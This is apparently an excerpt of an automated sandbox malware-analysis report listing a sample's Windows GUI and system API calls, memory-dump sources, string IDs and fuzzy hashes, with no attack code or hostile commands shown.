                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00465580
                                                                                                                                                                                                                                                                                    • SetRect.USER32 ref: 004655DE
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000005,00000000,00000005,00000000), ref: 004655ED
                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(0000000E,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,Arial), ref: 00465611
                                                                                                                                                                                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,00000005,00000000,00000005,00000000,?,00000000), ref: 00465655
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$CriticalRectSection$ColorCreateEnterFontGdiplusLeaveReleaseStartup
                                                                                                                                                                                                                                                                                    • String ID: 8<$Arial
                                                                                                                                                                                                                                                                                    • API String ID: 3457378621-1936108657
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042EF55
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF6C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF88
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 0042EFF2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,?,00000000), ref: 0042F0A9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                    • Opcode ID: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a8da6b0a3b4820785d32a6e99519bf5ba1baf34d33d3eec9a517c422a0835b5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51E2716083109BD720DF25E981B5BB7F4FB88710F800A7EF94997392D775E8058B9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32 ref: 0042EDC0
                                                                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0042EDEF
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0042EE38
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0042EE65
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042EEC4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$LongName$BrowseFolderFromListMessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402075$8F
                                                                                                                                                                                                                                                                                    • API String ID: 3410855119-1355043766
                                                                                                                                                                                                                                                                                    • Opcode ID: e6d7c4e539e09ccdccd185b6b38999d2c4effd13c27e3da9bd57aaf8eb70b9d9
                                                                                                                                                                                                                                                                                    • Instruction ID: 60252550f2a576e17c879c635a3a802f8da064449550e8d1e332f21db53478d5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6d7c4e539e09ccdccd185b6b38999d2c4effd13c27e3da9bd57aaf8eb70b9d9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F416471508301AFD310DF65DDC8EABBBE8FB58351F40092EF55A921E0D7749849CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00431D46
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00431D78
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431D9E
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00431DBC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00431DCA
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00431E69
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreate$BitmapClientMessageObjectRectSelectSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 2414545248-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                    • Instruction ID: 8bb2e0385ae3c531c2e170360c03eff7dceb5b5f9b27b4236f5b68df8b256744
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22412AB1508340AFC314DF68C985E5BBBE8FBC8714F048A1EF59993291DBB4E904CB66
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000010,00000002), ref: 0042352E
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(BB40E64E), ref: 00423545
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0042354F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CursorForegroundMenuWindow
                                                                                                                                                                                                                                                                                    • String ID: 3401016$^H
                                                                                                                                                                                                                                                                                    • API String ID: 390680170-2641057668
                                                                                                                                                                                                                                                                                    • Opcode ID: faab93a9ecdda988e109a15ecdd4a0b8bde11ad9370dbf823973790119351b1d
                                                                                                                                                                                                                                                                                    • Instruction ID: a08165e610b34e817a5423f464ddcc9bce1135992548fc6a69cc7effbf604316
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faab93a9ecdda988e109a15ecdd4a0b8bde11ad9370dbf823973790119351b1d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D31C472304340BBD324DF64D845F6B77A8EB84714F108A2FF50997680DB7DE8448BA9
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,00000000), ref: 004557C8
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32 ref: 00455855
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DiskFreeInformationSpaceVolume
                                                                                                                                                                                                                                                                                    • String ID: C:\$FAT$FAT16$FAT32$NTFS
                                                                                                                                                                                                                                                                                    • API String ID: 3270478670-3579686192
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0042F900
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 0042F916
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 0042FA08
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3401074$3401075$3401076$3401077
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1879149864
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,BB40E64E,00094638,?,?,00421AA0,BB40E64E), ref: 004242B3
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004242C5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00425460: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,?,Button_Check,?,?,00420A23), ref: 004254D9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,?,00000000), ref: 00424398
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RedrawWindow$MessageSend
                                                                                                                                                                                                                                                                                    • String ID: %s: %I64u $3401050$3401080$8F
                                                                                                                                                                                                                                                                                    • API String ID: 730354411-3927339091
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00424B28
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                    • Instruction ID: 473d6bda932dfe5e5726b0cd1595cc7b0c8836d5ab7cb817983b5e362455a3d3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A21D87176021077EB60AA94DCC6FD12354AB54B05F44407ABB04BE1C6CFEA6440CB69
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: 3401031$3401091$3401092$3401093$3401094
                                                                                                                                                                                                                                                                                    • API String ID: 0-3392424511
                                                                                                                                                                                                                                                                                    • Opcode ID: 37d193ba372bf6e1c91e1fe5256a9aaebbc690362ae3da444b1a8ca7c1b4217e
                                                                                                                                                                                                                                                                                    • Instruction ID: 77c164478e0e43f67134d1fe4851d669f71d822fc0b7581da06b97669060cadb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37d193ba372bf6e1c91e1fe5256a9aaebbc690362ae3da444b1a8ca7c1b4217e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B119CF0BA8704A6D3A066649D47FDA7170AF90B05FB18A1B778F359C5CBEC3041668E
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 00420AB8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101D,00000005,00000000), ref: 00420ACA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001207,00000006,?), ref: 00420AE9
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00420AFB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000005), ref: 00420B28
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00420B37
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$ClientRect
                                                                                                                                                                                                                                                                                    • String ID: Button_Check
                                                                                                                                                                                                                                                                                    • API String ID: 1925248871-1860365581
                                                                                                                                                                                                                                                                                    • Opcode ID: 2dbc91605b07778e48ee4b1ccc5bb52471f65858b054350958406698a8df70d5
                                                                                                                                                                                                                                                                                    • Instruction ID: f6960d58b42149bb48d8704757dd9bea0314272504ba79e98d6d7c5fe9983159
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dbc91605b07778e48ee4b1ccc5bb52471f65858b054350958406698a8df70d5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC115E717403057BE235EA79CC86FA773E9AB88B40F41491CF285EB1C1DAB9F9448B54
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                    • Instruction ID: 04dbbea40edafa167825a5640816ee55d2e105094fff44b6784cacd96e044d36
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47B136716083409FC310DF69C884A1BFBE9BFC9714F24895EE99887362D774E949CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00467820: DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,BB40E64E,00093C38,?,?,?,?,00000000,0047812F,000000FF,0041A4F1,BB40E64E,00093C38), ref: 00465814
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004658CF
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00465921
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00465973
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004659C5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DeleteObject$GdiplusShutdown
                                                                                                                                                                                                                                                                                    • String ID: 8K
                                                                                                                                                                                                                                                                                    • API String ID: 1337965791-3211281232
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OpenThemeData.UXTHEME(?,LISTVIEW,00000001), ref: 00416A0B
                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(?,?,00000006,00000002,?,00000000,?,00FFFFFF), ref: 00416A5D
                                                                                                                                                                                                                                                                                    • CloseThemeData.UXTHEME(?), ref: 00416A68
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00416A89
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectTheme$DataParent$BackgroundCloseDrawInflateInvalidateMessageOpenSendWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F$LISTVIEW
                                                                                                                                                                                                                                                                                    • API String ID: 2600991427-1963048992
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                    • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                    • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005FD977
                                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 005FD97F
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005FDA08
                                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 005FDA33
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005FDA88
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004674EB
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 004674FB
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0046751B
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0046752A
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00467561
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0046758A
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004675DC
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateParentRect$BitmapClientWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1335343179-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                    • Instruction ID: ec974f87df7e9fb3a3618fae45b6badb24d167debaf80877d84b9ed91747ca3a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D411AB1508740AFC315DF68C985E5BBBE8FBD8714F008A1EF59A93290DB74E844CB66
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _TrackMouseEvent.COMCTL32(00000010), ref: 0042E774
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 0042E7A7
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042E7C2
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 0042E7FC
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E821
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E83C
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042E84F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectRedrawWindow$ClientEventMouseTrack
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4196163336-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                    • Instruction ID: c4f66d3cff0941ef47ae988eb42254fc96aed82a1b76600b02dc3c2c7e15cd00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F03127B15047059FD314DF69D880AABBBE9FB88314F044A2EF59A83350E770E944CFA6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00423369
                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001), ref: 00423448
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00423452
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorForegroundIconLastNotifyShell_Window
                                                                                                                                                                                                                                                                                    • String ID: $>$3401082$3401083
                                                                                                                                                                                                                                                                                    • API String ID: 4150770455-2005305407
                                                                                                                                                                                                                                                                                    • Opcode ID: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                    • Instruction ID: 90de86b5fd52155df775e515d11431d32a4523fc17091ff82a2e95fa86d8e88e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2317EB1644301ABD310DF64DC4AFABB7E4FF44710F10892EF65EA2290DBB9A544CB99
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 00432EB2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00432EF5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,-00000002,00000000), ref: 00432F33
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402077$3402078$3402079
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-670106401
